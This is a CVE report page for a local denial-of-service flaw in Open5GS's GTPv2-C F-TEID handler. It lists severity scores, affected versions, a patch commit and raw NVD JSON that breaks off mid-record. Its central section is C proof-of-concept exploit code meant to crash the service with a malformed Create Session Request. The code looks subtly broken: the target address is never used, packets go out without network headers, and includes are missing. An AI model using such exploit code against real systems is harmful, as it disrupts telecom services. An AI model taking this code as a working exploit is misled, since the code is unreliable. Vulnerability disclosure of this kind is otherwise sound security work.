Security Vulnerability Report
CVE-2025-15417 CVSS 3.3 LOW

CVE-2025-15417

Published: 2026-01-01 23:15:56
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in Open5GS up to 2.7.6. It affects the function sgwc_s11_handle_create_session_request in the file src/sgwc/s11-handler.c, part of the GTPv2-C F-TEID Handler component. Manipulation leads to denial of service. The attack must be carried out locally. The exploit is publicly available and might be used. The patch is identified as 465273d13ba5d47b274c38c9d1b07f04859178a1. A patch should be applied to remediate this issue.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS < 2.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-15417 PoC - Open5GS SGWC GTPv2-C F-TEID DoS
 * This PoC demonstrates sending a malformed GTPv2-C Create Session Request
 * with crafted F-TEID to trigger denial of service in Open5GS.
 *
 * Usage: gcc -o poc poc.c -lsocket -lnet -lpcap
 * Run as: sudo ./poc <target_ip>
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pcap.h>

#define GTPV2C_PORT 2123
#define CREATE_SESSION_REQUEST 32

/* GTPv2-C Header */
typedef struct {
    uint8_t version:3;
    uint8_t piggyback:1;
    uint8_t teid_present:1;
    uint8_t spare:3;
    uint8_t message_type;
    uint16_t message_length;
    uint32_t teid;
    uint32_t sequence;
    uint8_t spare2[3];
} __attribute__((packed)) gtpv2c_header_t;

/* F-TEID IE */
typedef struct {
    uint8_t type;
    uint16_t length;
    uint8_t flags;
    uint8_t f_teid_data[10];
} __attribute__((packed)) f_teid_ie_t;

void send_malformed_packet(pcap_t *handle, char *target_ip) {
    unsigned char packet[256];
    gtpv2c_header_t *gtp_hdr = (gtpv2c_header_t *)packet;
    f_teid_ie_t *f_teid = (f_teid_ie_t *)(packet + sizeof(gtpv2c_header_t));

    /* Craft GTPv2-C Create Session Request */
    gtp_hdr->version = 2;
    gtp_hdr->piggyback = 0;
    gtp_hdr->teid_present = 1;
    gtp_hdr->spare = 0;
    gtp_hdr->message_type = CREATE_SESSION_REQUEST;
    gtp_hdr->teid = 0;
    gtp_hdr->sequence = 0x000001;

    /* Malformed F-TEID with invalid flags */
    f_teid->type = 0x57; /* F-TEID IE type */
    f_teid->length = htons(9);
    f_teid->flags = 0xFF; /* Invalid flags to trigger vulnerability */

    gtp_hdr->message_length = htons(sizeof(f_teid_ie_t) + 4);

    /* Send packet */
    pcap_sendpacket(handle, packet, sizeof(gtpv2c_header_t) + sizeof(f_teid_ie_t));
    printf("[+] Malformed GTPv2-C Create Session Request sent\n");
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <target_ip>\n", argv[0]);
        return 1;
    }

    char errbuf[PCAP_ERRBUF_SIZE];
    pcap_t *handle = pcap_open_live("any", 65535, 1, 1000, errbuf);
    if (handle == NULL) {
        fprintf(stderr, "Error opening pcap: %s\n", errbuf);
        return 1;
    }

    send_malformed_packet(handle, argv[1]);
    pcap_close(handle);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15417", "sourceIdentifier": "[email protected]", "published": "2026-01-01T23:15:56.180", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Open5GS up to 2.7.6. Affected is the function sgwc_s11_handle_create_session_request of the file src/sgwc/s11-handler.c of the component GTPv2-C F-TEID Handler. Such manipulation leads to denial of service. The attack must be carried out locally. The exploit is publicly available and might be used. The name of the patch is 465273d13ba5d47b274c38c9d1b07f04859178a1. A patch should be applied to remediate this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.6", "matchCriteriaId": "9C77332A-BAA3-4FE7-A237-B87F175C6F48"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/465273d13ba5d47b274c38c9d1b07f04859178a1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4203", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4203#issue-3719257558", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4203#issuecomment-3681643498", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.339339", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339339", "source": "[email protected]", "tags": ["Thir ... (truncated)